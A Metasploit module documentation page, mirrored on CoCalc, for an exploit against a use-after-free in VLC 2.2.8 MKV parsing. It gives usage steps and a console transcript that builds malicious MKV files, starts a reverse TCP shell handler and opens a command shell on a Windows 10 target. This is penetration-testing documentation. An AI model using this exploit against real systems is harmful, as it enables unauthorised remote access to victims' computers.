CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/documentation/modules/exploit/windows/fileformat/vlc_mkv.md
Views: 11789

Description

VideoLAN VLC <= v2.2.8 (32 and 64 bit) are vulnerable to a use-after-free vulnerability that exists in the parsing of MKV files.

This module has been tested against 32 and 64 bit versions of VLC v2.2.8 on Windows 10 Pro x64.

Vulnerable Application

VLC <= v2.2.8

Verification Steps

  • ./msfconsole -q

  • use exploit/windows/fileformat/vlc_mkv

  • run

  • Start handler

  • Copy over mkv files to target hosts and open part1 in VLC

  • Set a shell

Scenarios

Windows 10 x64 running VLC 2.2.8 (x64)

msf5 > use exploit/windows/fileformat/vlc_mkv
msf5 exploit(windows/fileformat/vlc_mkv) > set lhost 172.22.222.134 
lhost => 172.22.222.134
msf5 exploit(windows/fileformat/vlc_mkv) > run

[+] tjub-part1.mkv stored at /home/msfdev/.msf4/local/tjub-part1.mkv
[*] Created tjub-part1.mkv. Target should open this file
[+] tjub-part2.mkv stored at /home/msfdev/.msf4/local/tjub-part2.mkv
[*] Created tjub-part2.mkv. Put this file in the same directory as tjub-part1.mkv
[*] Appending blocks to tjub-part1.mkv
[+] Successfully appended blocks to tjub-part1.mkv
msf5 exploit(windows/fileformat/vlc_mkv) > handler -p windows/x64/shell/reverse_tcp -H 172.22.222.134 -P 4444
[*] Payload handler running as background job 0.
msf5 exploit(windows/fileformat/vlc_mkv) > 
[*] Started reverse TCP handler on 172.22.222.134:4444 
[*] Sending stage (336 bytes) to 172.22.222.200
[*] Command shell session 2 opened (172.22.222.134:4444 -> 172.22.222.200:49731) at 2018-10-10 12:08:58 -0500
sessions -i 2
[*] Starting interaction with 2...

systeminfo
systeminfo

Host Name:                 DESKTOP-IPOGIJR
OS Name:                   Microsoft Windows 10 Pro
OS Version:                10.0.17134 N/A Build 17134